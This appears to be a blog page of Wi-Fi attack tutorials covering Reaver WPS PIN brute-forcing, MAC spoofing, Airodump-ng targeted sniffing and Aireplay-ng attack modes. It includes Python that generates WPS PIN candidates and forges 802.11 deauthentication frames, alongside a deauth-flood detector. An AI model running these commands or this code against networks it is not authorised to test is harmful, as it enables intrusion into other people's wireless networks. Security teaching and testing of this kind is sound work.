Showing posts with label Wireless hacking. Show all posts

Saturday, April 27, 2013

Reaver WPS Hacking Tutorial Explained

Prerequisites
You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.
Basic Usage
First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver’s progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between PIN attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it: many rate-limit WPS, or lock it for a period after a burst of failed attempts, in which case a zero delay stalls the attack instead of speeding it up:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Default Pins
It has been reported that some models/vendors/ISPs ship all their devices configured with the same default PIN. Common PINs are 12345670, 00005678, 01230000, etc. Reaver attempts known default PINs first.
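Those three PINs are not arbitrary: the eighth digit of a WPS PIN is a check digit over the first seven, and the AP confirms the two halves of the PIN separately, which is why Reaver needs at most 11,000 guesses rather than 10^8. The following Python is an added example, not code from the original post or from Reaver; it implements the WPS check-digit rule (the same one hostapd's wps_pin_checksum() uses), validates the default PINs quoted above, and enumerates the candidates that remain once the first half is known.

```python
"""WPS PIN check digit and the size of the PIN space Reaver searches.

Added example: this is not code from the original post or from Reaver.
It implements the check-digit rule from the Wi-Fi Simple Configuration
(WPS) specification, the same rule hostapd's wps_pin_checksum() uses,
and shows why the three "default PINs" quoted in the post are all
well-formed.
"""

# The default PINs the post lists (copied from the text above).
REPORTED_DEFAULT_PINS = ["12345670", "00005678", "01230000"]


def wps_checksum(seven_digits):
    """Return the check digit for the first seven digits of a WPS PIN.

    Walking the digits from the right, odd positions are weighted 3 and
    even positions 1; the check digit makes the weighted sum a multiple
    of 10.
    """
    if not 0 <= seven_digits <= 9_999_999:
        raise ValueError("PIN body must fit in 7 digits")
    accum, pin = 0, seven_digits
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def make_pin(seven_digits):
    """Full 8-digit PIN string for a 7-digit body."""
    return f"{seven_digits:07d}{wps_checksum(seven_digits)}"


def is_valid_pin(pin):
    """True if pin is eight digits whose last digit is the correct check digit."""
    return len(pin) == 8 and pin.isdigit() and make_pin(int(pin[:7])) == pin


def effective_keyspace():
    """Worst-case number of PIN attempts against a WPS access point.

    After the registrar's M4 message (which proves knowledge of the first
    four digits) the AP answers with M5 or a NACK, so the first half can be
    confirmed on its own: 10**4 guesses. The second half is only three free
    digits because the eighth is fixed by the checksum: 10**3 more guesses.
    That 11,000 total, not 10**8, is the asymmetry Reaver exploits.
    """
    return 10**4 + 10**3


def candidate_pins(first_half):
    """The 1,000 well-formed PINs that share an already-confirmed first half."""
    if len(first_half) != 4 or not first_half.isdigit():
        raise ValueError("first half must be 4 digits")
    for rest in range(1000):
        yield make_pin(int(first_half) * 1000 + rest)


if __name__ == "__main__":
    for p in REPORTED_DEFAULT_PINS:
        print(p, "valid" if is_valid_pin(p) else "INVALID")
    print("worst-case attempts:", effective_keyspace())
```

A PIN whose check digit is wrong (12345678, say) is rejected by the AP before any half is verified, so a brute forcer that does not apply this rule wastes nine out of every ten second-half attempts.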
Errors and Warnings
It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the PIN count starts incrementing again.
However, if your PIN count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
Does the target AP support WPS and is WPS enabled?
Did you put your wireless card into monitor mode?
Did you specify the monitor mode interface with the -i option?
Do you have a good signal from the AP?
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
Linux distro, distro version, and architecture (32-bit or 64-bit?)
Wireless card and driver
Pcap file demonstrating the issue, if possible

Airodump-ng Explained in Detail.

Airodump-ng Usage
Airodump-ng has the following usage:
airodump-ng <options> <interface name>
Airodump-ng has many different options and we will be covering a great many of them through this tutorial. Some of the most common options are:



Prior to running Airodump-ng, your wireless card needs to be in monitor mode. Then, to run a basic sniffing session, the only parameter that needs to be passed is the wireless interface name.
airodump-ng <interface name>
Once Airodump-ng is launched, you will see something similar to this:

This may be confusing but it is really easy to understand.
Airodump-ng breakdown:
As you have seen, Airodump-ng presents a wealth of information while it is running its capture. The top line of the display, beginning at the left, shows the current channel, followed by the elapsed sniffing time, the current date and time, and, interestingly, an indication that a WPA handshake was captured. The significance of this will be covered later, but what it means is that a 4-way WPA handshake was captured for the access point with the BSSID C8:BC:C8:FE:D9:65.
The Airodump output is split into two sections. The top portion lists the access points that have been detected, along with the encryption in use, network names, channel and so on.
The lower portion lists client stations. There the STATION column holds the client's MAC address and the BSSID column holds the MAC address of the access point that client is associated with, or "(not associated)" for clients that are only sending probe requests.
The table below contains descriptions of all of the Airodump fields.



If you are in an area with many other access points, your Airodump display and capture files will become very cluttered with unwanted data. After doing your initial reconnaissance, you can determine the BSSID of the access point and the channel it is transmitting on and zero in on it specifically.
To sniff the data of an AP on channel 3 with the BSSID of 34:08:04:09:3D:38, you would first place your card in monitor mode locked to channel 3 (airmon-ng start takes the channel number as an optional final argument).



Now, you can launch Airodump-ng with some advanced filtering options to sniff only the traffic for the AP you are interested in by using the following syntax:
airodump-ng -c <Channel> --bssid <BSSID> -w <Capture> <interface name>


As can be seen in the above Airodump output, filtering for a specific access point makes for a much more manageable display and keeps your capture files to a reasonable size.
To further minimize the disk space used by the capture file, you can also include the '--ivs' option:
airodump-ng -c <Channel> --bssid <BSSID> -w <Capture> --ivs <interface name>
This flag stores only the initialization vectors (IVs) from each encrypted packet and not the full packet. An important point to keep in mind is that '--ivs' should NOT be used if you are attempting to capture a WPA/WPA2 handshake, or if you want to use the PTW attack against WEP: both need the complete frames, which an IVs-only file does not contain.
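The two halves of the live display (access points above, stations below) are also what ends up in the CSV file that -w <Capture> writes next to the pcap, as <Capture>-01.csv. The following Python is an added example, not code from the original post or from the aircrack-ng suite: it parses a hand-constructed CSV in that layout (the BSSIDs and ESSIDs reuse the ones quoted on this page; the client MACs and timestamps are made up) and answers the questions you otherwise answer by eye, which clients belong to which BSSID and which unassociated clients are still probing for a network name.

```python
"""Parse an airodump-ng CSV file (written by -w <Capture> as <Capture>-01.csv)
and answer the questions the two halves of the live display answer.

Added example: not code from the original post or from the aircrack-ng
suite. The CSV below is constructed by hand in the layout airodump-ng
writes: an access-point table, a blank line, then a station table. Its
BSSIDs and ESSIDs reuse the ones that appear elsewhere on this page; the
client MACs and timestamps are made up.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
34:08:04:09:3D:38, 2013-04-27 12:00:01, 2013-04-27 12:05:30,  3,  54, WPA2, CCMP, PSK, -37,  312,   18,   0.  0.  0.  0,  9, em3rgency,
C8:BC:C8:FE:D9:65, 2013-04-27 12:00:01, 2013-04-27 12:05:30,  2,  54, WEP, WEP,    , -55,  120, 4011,   0.  0.  0.  0,  6, secnet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1C:BF:11:22:33, 2013-04-27 12:00:40, 2013-04-27 12:05:29, -41,  155, 34:08:04:09:3D:38, em3rgency
00:26:5E:44:55:66, 2013-04-27 12:01:02, 2013-04-27 12:05:30, -60,   12, (not associated) , secnet,em3rgency
00:1F:3B:77:88:99, 2013-04-27 12:02:10, 2013-04-27 12:05:30, -58,   40, C8:BC:C8:FE:D9:65,
"""


def _rows(block):
    """CSV rows as lists of stripped cells, with blank rows dropped."""
    return [[c.strip() for c in row] for row in csv.reader(io.StringIO(block)) if row]


def parse_airodump_csv(text):
    """Return (aps, stations), each a list of dicts keyed by the CSV header names.

    The station table's last column, "Probed ESSIDs", is itself a comma
    separated list, so everything after the sixth cell is folded into a
    Python list instead of being zipped against the header.
    """
    ap_block, _, sta_block = text.partition("\n\n")
    ap_rows = _rows(ap_block)
    aps = [dict(zip(ap_rows[0], row)) for row in ap_rows[1:]]

    sta_rows = _rows(sta_block)
    head = sta_rows[0]
    stations = []
    for row in sta_rows[1:]:
        station = dict(zip(head[:6], row[:6]))
        station["Probed ESSIDs"] = [p for p in row[6:] if p]
        stations.append(station)
    return aps, stations


def ap_summary(aps):
    """(BSSID, channel, privacy, ESSID): the columns you pick -c and --bssid from."""
    return [(a["BSSID"], int(a["channel"]), a["Privacy"], a["ESSID"]) for a in aps]


def clients_of(stations, bssid):
    """Station MACs airodump-ng saw associated with one BSSID (the lower table)."""
    return [s["Station MAC"] for s in stations if s["BSSID"].lower() == bssid.lower()]


def probing_for(stations, essid):
    """Stations that sent probe requests for an ESSID, associated or not.

    Unassociated clients still probing for a network name are the ones a
    rogue AP broadcasting that name would pull in, which is why a WIDS
    keeps this column.
    """
    return [s["Station MAC"] for s in stations if essid in s["Probed ESSIDs"]]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for row in ap_summary(aps):
        print(row)
    print("clients of 34:08:04:09:3D:38:", clients_of(stations, "34:08:04:09:3D:38"))
    print("probing for em3rgency:", probing_for(stations, "em3rgency"))
```

The one column that needs care is "Probed ESSIDs": airodump-ng joins several names with commas and does not quote them, so a naive zip against the header silently drops every probe after the first.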
No APs or Clients are Shown
• If you have a laptop with a built-in wireless card, ensure it is enabled in the BIOS.
• Make sure your card works in managed mode.
• Try unloading the driver with rmmod and reloading it with modprobe.
Little or No Data Being Captured
• Ensure that you have used the -c or --channel option to specify a single channel. Otherwise, Airodump-ng will hop between the different channels.
• You might need to be physically closer to the AP to get a good quality signal.
• Ensure that you have started your wireless card in monitor mode with Airmon-ng.
• If you are using a Madwifi-ng driver, make sure that there are no other VAPs running. There can be issues when creating a new VAP in monitor mode if there is an existing VAP in managed mode.

Aireplay-ng Explained in detail

Aireplay-ng is primarily used to generate or accelerate wireless traffic for later use with Aircrack-ng to crack WEP and WPA-PSK keys. Aireplay-ng supports various attacks such as deauthentication (for the purpose of capturing the 4-way WPA handshake), fake authentication, interactive packet replay, and more.
Aireplay-ng supports the following attacks along with their corresponding numbers:

This section provides a general usage overview, as not all options apply to all attacks. See the command options of the specific attack you wish to use for the relevant details.
aireplay-ng <options> <interface name>
For all attacks, with the exception of deauthentication and fake authentication, you may use the following filters to limit the packets that will be used in the attack. The most commonly used filter option is '-b' to single out a specific AP.

When replaying (injecting) packets, the following options apply. Bear in mind that not every option is relevant for every attack. The specific attack documentation provides examples of the relevant options.

The Aireplay-ng attacks can obtain packets from two sources. The first source is a live flow of packets from your wireless card, whereas the second source is a pre-captured pcap file. The standard pcap format (http://www.tcpdump.org) is recognized by most commercial and open-source traffic capture and analysis tools. Reading from a file is an often-overlooked feature of Aireplay-ng.

The following attack modes are specified with the following switches. Numbers can be used instead of the attack names.
• --deauth <count> (-0): deauthenticate one or all stations
• --fakeauth <delay> (-1): fake authentication with the AP
• --interactive (-2): interactive frame selection
• --arpreplay (-3): standard ARP-request replay
• --chopchop (-4): decrypt/chopchop a WEP packet
• --fragment (-5): generate a valid keystream
• --caffe-latte (-6): query a client for new IVs
• --cfrag (-7): fragments against a client
• --migmode (-8): attack WPA migration mode
• --test (-9): test injection and quality
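The deauthentication attack mentioned at the top of this section works because a deauthentication frame is a 26-byte unauthenticated management frame that any card in monitor mode can forge. The following Python is an added example, not code from the original post or from aireplay-ng: it builds that frame byte for byte (the duration and reason-code values are the ones aireplay-ng's deauth template uses), parses it back, and applies the check a wireless IDS uses to spot the attack, a burst of deauths from one source. The client MAC in the usage is made up; the BSSID is the one quoted elsewhere on this page.

```python
"""802.11 deauthentication frames: the bytes aireplay-ng's deauth attack
puts on the air, and the mirror-image check a wireless IDS applies.

Added example: not code from the original post or from aireplay-ng. Frames
are raw 802.11 without a radiotap header or FCS; the duration and reason
code values match aireplay-ng's deauth template. The BSSID is the one
quoted elsewhere on this page; the client address is made up.
"""
import struct
from collections import Counter

FC_DEAUTH = 0x00C0        # frame control: type 0 (management), subtype 12 (deauth), no flags
DURATION = 0x013A         # the duration value aireplay-ng writes into its deauth frames
REASON_CLASS3_FROM_NONASSOC = 7   # reason code aireplay-ng sends
BROADCAST = "ff:ff:ff:ff:ff:ff"
HDR = "<HH6s6s6sH"        # FC, duration, addr1 (dst), addr2 (src), addr3 (BSSID), sequence control
HDR_LEN = struct.calcsize(HDR)    # 24 bytes


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(bssid, client=BROADCAST, reason=REASON_CLASS3_FROM_NONASSOC, seq=0):
    """Return one deauth frame as the AP would send it to `client`.

    Addressed to ff:ff:ff:ff:ff:ff it kicks every client off at once, which
    is what makes a WPA 4-way handshake reappear in the capture. A client
    that negotiated 802.11w (Protected Management Frames) discards this
    frame because it carries no MIC.
    """
    header = struct.pack(HDR, FC_DEAUTH, DURATION,
                         mac_to_bytes(client), mac_to_bytes(bssid), mac_to_bytes(bssid),
                         (seq & 0xFFF) << 4)
    return header + struct.pack("<H", reason)


def parse_deauth(frame):
    """Decode a deauth frame into a dict, or return None for any other frame."""
    if len(frame) < HDR_LEN + 2:
        return None
    fc, _, dst, src, bssid, seqctl = struct.unpack_from(HDR, frame, 0)
    if fc & 0x00FC != FC_DEAUTH:   # keep the type/subtype bits, ignore version and flags
        return None
    (reason,) = struct.unpack_from("<H", frame, HDR_LEN)
    return {"dst": bytes_to_mac(dst), "src": bytes_to_mac(src),
            "bssid": bytes_to_mac(bssid), "seq": seqctl >> 4, "reason": reason}


def deauth_flood_sources(frames, threshold=10):
    """Sources that sent at least `threshold` deauths within `frames`.

    A real AP deauthenticates a client now and then; dozens of deauths from
    one BSSID inside a single capture window are an attack signature.
    """
    counts = Counter()
    for f in frames:
        d = parse_deauth(f)
        if d is not None:
            counts[d["src"]] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    # Constructed burst: 64 deauths from the AP to one (made-up) client.
    burst = [build_deauth("34:08:04:09:3D:38", client="00:1c:bf:11:22:33", seq=i)
             for i in range(64)]
    print(burst[0].hex())
    print("flood sources:", deauth_flood_sources(burst))
```

The detection side deliberately keys on the source address rather than the reason code: an attacker can choose any reason code, but cannot make a burst of forged frames look like anything other than a burst.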


The following troubleshooting tips apply to all modes of Aireplay-ng.
Aireplay-ng does not Inject Packets
Ensure that you are using the correct monitor mode interface. Running 'iwconfig' will show the wireless interfaces and their states. For devices using mac80211 drivers, the monitor mode interface is typically named mon0. For users of madwifi-ng drivers, ensure that there are no other VAPs running.
Aireplay-ng Hangs with No Output
If you enter the command and it appears to hang with no output, this is typically due to your wireless card being on a different channel number than the access point. Also, if you have another instance of Aireplay-ng running in background mode, this can cause the second command to hang if the options conflict.
Aireplay-ng "write failed: Cannot allocate memory wi_write(): illegal seek"
When using a wireless card with a Broadcom chipset, you may encounter this bug found in the original bcm43xx patch. You can try using the b43 driver instead of bcm43xx.
Aireplay-ng has Slow Injection "rtc: lost some interrupts at 1024Hz"
If you see that you are injecting packets successfully but very slowly, at around 30 packets per second, and receive the kernel message "rtc: lost some interrupts at 1024Hz", there is no fix other than to start another instance of Aireplay-ng, which should increase the injection rate.

Injection Test Usage
The injection test has the following usage:
aireplay-ng -9 -e <ESSID> -a <AP MAC> -i <interface> <interface name>
Where:
• -9: injection test
• -e: optional ESSID (network name)
• -a: optional AP MAC address
• -i: optional interface name for the two card injection test
• <interface name>: the interface name to use for the test
Important: You must set your card to the desired channel with Airmon-ng prior to running any of the tests.
The basic injection test determines if your card successfully supports injection. As
mentioned earlier, the wireless card must first be in monitor mode:

Next, the basic injection test is launched using the following syntax:
aireplay-ng -9 <interface name>

Injection Test Results Analysis
• 12:02:10 Injection is working!: This confirms that the wireless card can inject.
• 12:02:11 Found 2 APs: These APs were found either through the broadcast probes or received beacons.
• 12:02:12 34:08:04:09:3D:38 - channel: 3 - 'em3rgency': The first AP being tested.
• 12:02:13 Ping (min/avg/max): 1.455ms/4.163ms/12.006ms Power: -37.63: The ping times are calculated.
• 12:02:13 30/30: 100%: The pings had a 100% success rate for the AP.
• 12:02:13 C8:BC:C8:FE:D9:65 - channel: 2 - 'secnet': Notice that this AP is on channel 2, not channel 3, the channel the card was set to for the test.
